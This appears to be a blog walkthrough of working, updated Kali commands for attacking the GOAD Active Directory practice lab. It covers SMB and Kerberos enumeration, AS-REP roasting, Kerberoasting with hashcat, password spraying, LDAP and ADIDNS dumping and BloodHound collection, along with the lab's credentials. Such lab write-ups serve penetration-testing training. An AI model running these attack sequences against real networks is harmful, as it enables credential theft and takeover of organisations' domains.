GOAD writeups I’ve seen are outdated and several commands no longer work on current Kali builds. This post provides working, tested command examples that align with the latest tool versions and typical GOAD lab topologies. All examples were validated in a fresh Kali install.
1. Initial Network and Service Enumeration
nmap -Pn -p- -sC -sV -oA full_scan_goad 10.3.10.10-12,22-23
2. SMB Enumeration
crackmapexec smb 10.3.10.11 --users
crackmapexec smb 10.3.10.11 --pass-pol
enum4linux 10.3.10.11
rpcclient -U "NORTH\" 10.3.10.11 -N
net rpc group members 'Domain Users' -W 'NORTH' -I '10.3.10.11' -U '%'
3. Generating Userlists from Game of Thrones Cast Data
curl -s https://www.hbo.com/game-of-thrones/cast-and-crew | \
grep 'href="/game-of-thrones/cast-and-crew/' | \
grep -o 'aria-label="[^"]*"' | cut -d '"' -f 2 | \
awk '{if($2 == "") {print tolower($1)} else {print tolower($1) "." tolower($2);} }' \
> got_users.txt
4. Kerberos User Enumeration
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 10.3.10.10
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 10.3.10.12
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 10.3.10.11
5. Authenticated SMB Enumeration
crackmapexec smb -u khal.drogo -p horse -d essos.local 10.3.10.12 --users
crackmapexec smb 10.3.10.10-23 -u 'a' -p '' --shares
6. AS-REP Roasting and Password Attacks
impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile sevenkingdoms_users.txt
cd /usr/share/wordlists
sudo gunzip rockyou.txt.gz
sudo chown kali:kali rockyou.txt
hashcat -m 18200 arsephash /usr/share/wordlists/rockyou.txt
7. Broad Credential Spray
crackmapexec smb 10.3.10.11 -u sevenkingdoms_users.txt -p sevenkingdoms_users.txt --no-bruteforce
8. Full AD User Enumeration
impacket-GetADUsers -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople
9. LDAP Enumeration
ldapsearch -H ldap://10.3.10.11 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep 'distinguishedName:'
ldapsearch -H ldap://10.3.10.12 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=essos,DC=local' "(&(objectCategory=person)(objectClass=user))"
ldapsearch -H ldap://10.3.10.10 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))"
10. Kerberoasting
impacket-GetUserSPNs -request -dc-ip 10.3.10.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
If your clock is off:
sudo apt install ntpdate -y
sudo ntpdate 10.3.10.11
Then rerun:
impacket-GetUserSPNs north.sevenkingdoms.local/brandon.stark:iseedeadpeople -dc-ip 10.3.10.11 -request
Crack the hashes:
hashcat -m 13100 -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt --force
11. Post Roasting SMB Access
crackmapexec smb 10.3.10.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares
12. ADIDNS Enumeration
git clone https://github.com/dirkjanm/adidnsdump && cd adidnsdump
pip install . --break-system-packages
adidnsdump -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' winterfell.north.sevenkingdoms.local
13. BloodHound Collection
bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local -gc winterfell.north.sevenkingdoms.local -ns 10.3.10.11
bloodhound-python --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local -gc kingslanding.sevenkingdoms.local -ns 10.3.10.11
bloodhound-python --zip -c All -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc meereen.essos.local -gc meereen.essos.local -ns 10.3.10.11
0 Comments